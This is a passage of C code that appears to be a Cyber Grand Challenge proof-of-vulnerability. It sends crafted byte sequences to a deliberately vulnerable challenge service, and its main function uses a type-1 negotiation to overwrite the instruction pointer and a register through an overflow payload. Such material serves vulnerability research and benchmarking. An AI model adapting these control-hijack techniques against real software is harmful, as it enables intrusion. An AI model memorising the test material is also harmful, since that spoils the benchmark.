(write_00008_len > 0) { transmit_all(1, write_00008, write_00008_len); } free(write_00008); } while (0); do { unsigned char *read_00008; unsigned int read_00008_len; unsigned int read_00008_ptr = 0; //**** length read read_00008_len = 4; read_00008 = (unsigned char*)malloc(read_00008_len); int read_00008_res = length_read(0, read_00008, read_00008_len); if (read_00008_res) {} //silence unused variable warning free(read_00008); if (read_00008_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00009_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xa8\x13\x00\x00\x4b\x68\x62\x6c" "\x53\x6f\x79\x46\x64\x76\x5a\x44\x73\x42\x56\x6d\x4d\x6b\x7a\x42" "\x66\x69\x44\x73\x74\x6b\x61\x6e\x71\x68\x66\x41"; static unsigned int write_00009_00000_len = 44; unsigned char *write_00009 = NULL; unsigned int write_00009_len = 0; write_00009 = append_buf(write_00009, &write_00009_len, write_00009_00000, write_00009_00000_len); if (write_00009_len > 0) { transmit_all(1, write_00009, write_00009_len); } free(write_00009); } while (0); do { unsigned char *read_00009; unsigned int read_00009_len; unsigned int read_00009_ptr = 0; //**** length read read_00009_len = 4; read_00009 = (unsigned char*)malloc(read_00009_len); int read_00009_res = length_read(0, read_00009, read_00009_len); if (read_00009_res) {} //silence unused variable warning free(read_00009); if (read_00009_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00010_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xe1\x79\x01\x00\x74\xf8\x4c\x59" "\x73\x5a\x64\x42\x4d\x48\x44\x45\x6a\x56\x76\x4d\x79\x6f\x49\x4d" "\x79\x63\x41\x50\x45\x69\x75\x4c\x78\x6d\x73\x4b"; static unsigned int write_00010_00000_len = 44; unsigned char *write_00010 = NULL; unsigned int write_00010_len = 0; write_00010 = append_buf(write_00010, &write_00010_len, write_00010_00000, write_00010_00000_len); if (write_00010_len > 0) { transmit_all(1, write_00010, write_00010_len); } free(write_00010); } while (0); do { unsigned char *read_00010; unsigned int read_00010_len; unsigned int read_00010_ptr = 0; //**** length read read_00010_len = 4; read_00010 = (unsigned char*)malloc(read_00010_len); int read_00010_res = length_read(0, read_00010, read_00010_len); if (read_00010_res) {} //silence unused variable warning free(read_00010); if (read_00010_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00011_00000[] = "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x71\xe1\x00\x00\x05\x0e\x69\x77" "\x6f\x65\x69\x64\x53\x6b\x68\x4f\x51\x69\x75\x66\x57\x54\x54\x4b" "\x41\x67\x53\x71\x43\x41\x79\x48\x7a\x72\x73\x68"; static unsigned int write_00011_00000_len = 44; unsigned char *write_00011 = NULL; unsigned int write_00011_len = 0; write_00011 = append_buf(write_00011, &write_00011_len, write_00011_00000, write_00011_00000_len); if (write_00011_len > 0) { transmit_all(1, write_00011, write_00011_len); } free(write_00011); } while (0); do { unsigned char *read_00011; unsigned int read_00011_len; unsigned int read_00011_ptr = 0; //**** length read read_00011_len = 4; read_00011 = (unsigned char*)malloc(read_00011_len); int read_00011_res = length_read(0, read_00011, read_00011_len); if (read_00011_res) {} //silence unused variable warning free(read_00011); if (read_00011_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data union parent1, parent2 static unsigned char write_00012_00000[] = "\xf0\xf1\xf2\xf3\x08\x00\x00\x00\xd8\xc0\x00\x00\x6c\x13\x00\x00"; static unsigned int write_00012_00000_len = 16; unsigned int *buf = (unsigned int *)write_00012_00000; buf[3] = p2_val; unsigned char *write_00012 = NULL; unsigned int write_00012_len = 0; write_00012 = append_buf(write_00012, &write_00012_len, write_00012_00000, write_00012_00000_len); if (write_00012_len > 0) { transmit_all(1, write_00012, write_00012_len); } free(write_00012); } while (0); do { unsigned char *read_00012; unsigned int read_00012_len; unsigned int read_00012_ptr = 0; //**** length read read_00012_len = 4; read_00012 = (unsigned char*)malloc(read_00012_len); int read_00012_res = length_read(0, read_00012, read_00012_len); if (read_00012_res) {} //silence unused variable warning free(read_00012); if (read_00012_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data adopted child child, parent1, parent2 static unsigned char write_00013_00000[] = "\xac\xac\xac\xac\x0c\x00\x00\x00\x1f\xbc\x00\x00\xd8\xc0\x00\x00" "\x6c\x13\x00\x00"; static unsigned int write_00013_00000_len = 20; unsigned int *buf = (unsigned int *)write_00013_00000; buf[4] = p2_val; unsigned char *write_00013 = NULL; unsigned int write_00013_len = 0; write_00013 = append_buf(write_00013, &write_00013_len, write_00013_00000, write_00013_00000_len); if (write_00013_len > 0) { transmit_all(1, write_00013, write_00013_len); } free(write_00013); } while (0); do { unsigned char *read_00013; unsigned int read_00013_len; unsigned int read_00013_ptr = 0; //**** length read read_00013_len = 4; read_00013 = (unsigned char*)malloc(read_00013_len); int read_00013_res = length_read(0, read_00013, read_00013_len); if (read_00013_res) {} //silence unused variable warning free(read_00013); if (read_00013_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data separated parent1, parent2 static unsigned char write_00014_00000[] = "\x50\x11\x50\x11\x08\x00\x00\x00\xd8\xc0\x00\x00\x6c\x13\x00\x00"; static unsigned int write_00014_00000_len = 16; unsigned int *buf = (unsigned int *)write_00014_00000; buf[3] = p2_val; unsigned char *write_00014 = NULL; unsigned int write_00014_len = 0; write_00014 = append_buf(write_00014, &write_00014_len, write_00014_00000, write_00014_00000_len); if (write_00014_len > 0) { transmit_all(1, write_00014, write_00014_len); } free(write_00014); } while (0); do { unsigned char *read_00014; unsigned int read_00014_len; unsigned int read_00014_ptr = 0; //**** length read read_00014_len = 4; read_00014 = (unsigned char*)malloc(read_00014_len); int read_00014_res = length_read(0, read_00014, read_00014_len); if (read_00014_res) {} //silence unused variable warning free(read_00014); if (read_00014_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data union parent2, parent3 static unsigned char write_00015_00000[] = "\xf0\xf1\xf2\xf3\x08\x00\x00\x00\x6c\x13\x00\x00\x82\x24\x00\x00"; static unsigned int write_00015_00000_len = 16; unsigned int *buf = (unsigned int *)write_00015_00000; buf[2] = p2_val; buf[3] = p3_val; unsigned char *write_00015 = NULL; unsigned int write_00015_len = 0; write_00015 = append_buf(write_00015, &write_00015_len, write_00015_00000, write_00015_00000_len); if (write_00015_len > 0) { transmit_all(1, write_00015, write_00015_len); } free(write_00015); } while (0); do { unsigned char *read_00015; unsigned int read_00015_len; unsigned int read_00015_ptr = 0; //**** length read read_00015_len = 4; read_00015 = (unsigned char*)malloc(read_00015_len); int read_00015_res = length_read(0, read_00015, read_00015_len); if (read_00015_res) {} //silence unused variable warning free(read_00015); if (read_00015_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data separated parent2, parent3 static unsigned char write_00016_00000[] = "\x50\x11\x50\x11\x08\x00\x00\x00\x6c\x13\x00\x00\x82\x24\x00\x00"; static unsigned int write_00016_00000_len = 16; unsigned int *buf = (unsigned int *)write_00016_00000; buf[2] = p2_val; buf[3] = p3_val; unsigned char *write_00016 = NULL; unsigned int write_00016_len = 0; write_00016 = append_buf(write_00016, &write_00016_len, write_00016_00000, write_00016_00000_len); if (write_00016_len > 0) { transmit_all(1, write_00016, write_00016_len); } free(write_00016); } while (0); do { unsigned char *read_00016; unsigned int read_00016_len; unsigned int read_00016_ptr = 0; //**** length read read_00016_len = 4; read_00016 = (unsigned char*)malloc(read_00016_len); int read_00016_res = length_read(0, read_00016, read_00016_len); if (read_00016_res) {} //silence unused variable warning free(read_00016); if (read_00016_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data adopted child child, p_unk, parent2 static unsigned char write_00017_00000[] = "\xac\xac\xac\xac\x0c\x00\x00\x00\x1f\xbc\x00\x00\x00\x00\x00\x00" "\x6c\x13\x00\x00"; static unsigned int write_00017_00000_len = 20; unsigned int *buf = (unsigned int *)write_00017_00000; buf[4] = p2_val; unsigned char *write_00017 = NULL; unsigned int write_00017_len = 0; write_00017 = append_buf(write_00017, &write_00017_len, write_00017_00000, write_00017_00000_len); if (write_00017_len > 0) { transmit_all(1, write_00017, write_00017_len); } free(write_00017); } while (0); do { unsigned char *read_00017; unsigned int read_00017_len; unsigned int read_00017_ptr = 0; //**** length read read_00017_len = 4; read_00017 = (unsigned char*)malloc(read_00017_len); int read_00017_res = length_read(0, read_00017, read_00017_len); if (read_00017_res) {} //silence unused variable warning free(read_00017); if (read_00017_ptr) {} //silence unused variable warning if any } while (0); }
int main(void) { type1_vals t1vals; type1_negotiate(0xedededed, 0xedededed, 7, &t1vals); // can use either EAX(0) or EDI(7) unsigned int no_ed = 0x12121212; // have to prevent 0xed from each byte of EIP and REG do { //*** writing data static unsigned char write_00000_00000[] = "\xad\xdd\xad\xdd"; static unsigned int write_00000_00000_len = 4; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x38\x31\x39\x36\x33\x38\x39\x30"; static unsigned int write_00001_00000_len = 8; unsigned char *write_00001 = NULL; unsigned int write_00001_len = 0; write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len); if (write_00001_len > 0) { transmit_all(1, write_00001, write_00001_len); } free(write_00001); } while (0); do { //*** writing data static unsigned char write_00002_00000[] = "\x8c\xdc\x00\x00\x14\xae\x07\x41\x47\x71\x56\x59\x4e\x4e\x43\x54" "\x64\x46\x54\x6f\x4a\x67\x62\x6e\x4b\x56\x73\x4e\x72\x4a\x54\x72" "\x42\x45\x44\x65\x50\x57\x7a\x53\x4b\x6a\x51\x51\x68\x75\x53\x6f" "\x74\x75\x71\x49\x4a\x70\x63\x67\x52\x49\x76\x74\x4a\x70\x49\x4d" "\x4c\x4b\x62\x71\x44\x79\x76\x6a\x4f\x53\x41\x47\x66\x75\x46\x6c" "\x4f\x41\x51\x66\x54\x4d\x64\x4e\x4d\x7a\x52\x56\x43\x48\x78\x64" "\x4a\x43\x5a\x53\x4a\x52\x52\x61\x4c\x63\x7a\x43\x41\x69\x6c\x66" "\x4f\x76\x64\x62\x6e\x4b\x6e\x48\x77\x6a\x51\x43\x7a\x6c\x4a\x61" "\x66\x4f\x47\x68\x6a\x5a\x5a\x41"; static unsigned int write_00002_00000_len = 136; unsigned char *write_00002 = NULL; unsigned int write_00002_len = 0; write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len); if (write_00002_len > 0) { transmit_all(1, write_00002, write_00002_len); } free(write_00002); } while (0); do { // EAX (have to prevent 0xed frm each of the 4 bytes) //*** writing data unsigned int reg = t1vals.regval | no_ed; unsigned char *write_00003 = NULL; unsigned int write_00003_len = 0; write_00003 = append_buf(write_00003, &write_00003_len, (unsigned char*)®, 4); if (write_00003_len > 0) { transmit_all(1, write_00003, write_00003_len); } free(write_00003); } while (0); do { //*** writing data static unsigned char write_00004_00000[] = "\x43\x43\x43\x43"; static unsigned int write_00004_00000_len = 4; unsigned char *write_00004 = NULL; unsigned int write_00004_len = 0; write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len); if (write_00004_len > 0) { transmit_all(1, write_00004, write_00004_len); } free(write_00004); } while (0); do { // EIP (have to prevent 0xed from each of the 4 bytes) //*** writing data unsigned int eip = t1vals.ipval | no_ed; unsigned char *write_00005 = NULL; unsigned int write_00005_len = 0; write_00005 = append_buf(write_00005, &write_00005_len, (unsigned char*)&eip, 4); if (write_00005_len > 0) { transmit_all(1, write_00005, write_00005_len); } free(write_00005); } while (0); do { //*** writing data static unsigned char write_00006_00000[] = "\xed"; static unsigned int write_00006_00000_len = 1; unsigned char *write_00006 = NULL; unsigned int write_00006_len = 0; write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len); if (write_00006_len > 0) { transmit_all(1, write_00006, write_00006_len); } free(write_00006); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length cgc_read read_00000_len = 2; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); if (read_00000_res) {} //silence unused variable warning free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00007_00000[] = "\xc4\xec\x4e\xee"; static unsigned int write_00007_00000_len = 4; unsigned char *write_00007 = NULL; unsigned int write_00007_len = 0; write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len); if (write_00007_len > 0) { transmit_all(1, write_00007, write_00007_len); } free(write_00007); } while (0); do { //*** writing data static unsigned char write_00008_00000[] = "\x38\x31\x39\x36\x33\x38\x39\x30"; static unsigned int write_00008_00000_len = 8; unsigned char *write_00008 = NULL; unsigned int write_00008_len = 0; write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len); if (write_00008_len > 0) { transmit_all(1, write_00008, write_00008_len); } free(write_00008); } while (0); do { unsigned char *read_00001; unsigned int read_00001_len; unsigned int read_00001_ptr = 0; //**** length cgc_read read_00001_len = 4; read_00001 = (unsigned char*)malloc(read_00001_len); int read_00001_res = length_read(0, read_00001, read_00001_len); if (read_00001_res) {} //silence unused variable warning free(read_00001); if (read_00001_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00002; unsigned int read_00002_len; unsigned int read_00002_ptr = 0; //**** length cgc_read read_00002_len = 4; read_00002 = (unsigned char*)malloc(read_00002_len); int read_00002_res = length_read(0, read_00002, read_00002_len); if (read_00002_res) {} //silence unused variable warning free(read_00002); if (read_00002_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00003; unsigned int read_00003_len; unsigned int read_00003_ptr = 0; //**** length cgc_read read_00003_len = 141; read_00003 = (unsigned char*)malloc(read_00003_len); int read_00003_res = length_read(0, read_00003, read_00003_len); if (read_00003_res) {} //silence unused variable warning //**** cgc_read match data static unsigned char match_00003_00000[] = "\x47\x71\x56\x59\x4e\x4e\x43\x54\x64\x46\x54\x6f\x4a\x67\x62\x6e" "\x4b\x56\x73\x4e\x72\x4a\x54\x72\x42\x45\x44\x65\x50\x57\x7a\x53" "\x4b\x6a\x51\x51\x68\x75\x53\x6f\x74\x75\x71\x49\x4a\x70\x63\x67" "\x52\x49\x76\x74\x4a\x70\x49\x4d\x4c\x4b\x62\x71\x44\x79\x76\x6a" "\x4f\x53\x41\x47\x66\x75\x46\x6c\x4f\x41\x51\x66\x54\x4d\x64\x4e" "\x4d\x7a\x52\x56\x43\x48\x78\x64\x4a\x43\x5a\x53\x4a\x52\x52\x61" "\x4c\x63\x7a\x43\x41\x69\x6c\x66\x4f\x76\x64\x62\x6e\x4b\x6e\x48" "\x77\x6a\x51\x43\x7a\x6c\x4a\x61\x66\x4f\x47\x68\x6a\x5a\x5a\x41" "\x4d\x4d\x4d\x4d\x43\x43\x43\x43\x45\x45\x45\x45\xed"; read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 141); free(read_00003); if (read_00003_ptr) {} //silence unused variable warning if any } while (0); do { unsigned char *read_00004; unsigned int read_00004_len; unsigned int read_00004_ptr = 0; //**** length cgc_read read_00004_len = 2; read_00004 = (unsigned char*)malloc(read_00004_len); int read_00004_res = length_read(0, read_00004, read_00004_len); if (read_00004_res) {} //silence unused variable warning free(read_00004); if (read_00004_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00009_00000[] = "\xff\xff\xff\xff"; static unsigned int write_00009_00000_len = 4; unsigned char *write_00009 = NULL; unsigned int write_00009_len = 0; write_00009 = append_buf(write_00009, &write_00009_len, write_00009_00000, write_00009_00000_len); if (write_00009_len > 0) { transmit_all(1, write_00009, write_00009_len); } free(write_00009); } while (0); do { unsigned char *read_00005; unsigned int read_00005_len; unsigned int read_00005_ptr = 0; //**** length cgc_read read_00005_len = 2; read_00005 = (unsigned char*)malloc(read_00005_len); int read_00005_res = length_read(0, read_00005, read_00005_len); if (read_00005_res) {} //silence unused variable warning free(read_00005); if (read_00005_ptr) {} //silence unused variable warning if any } while (0); }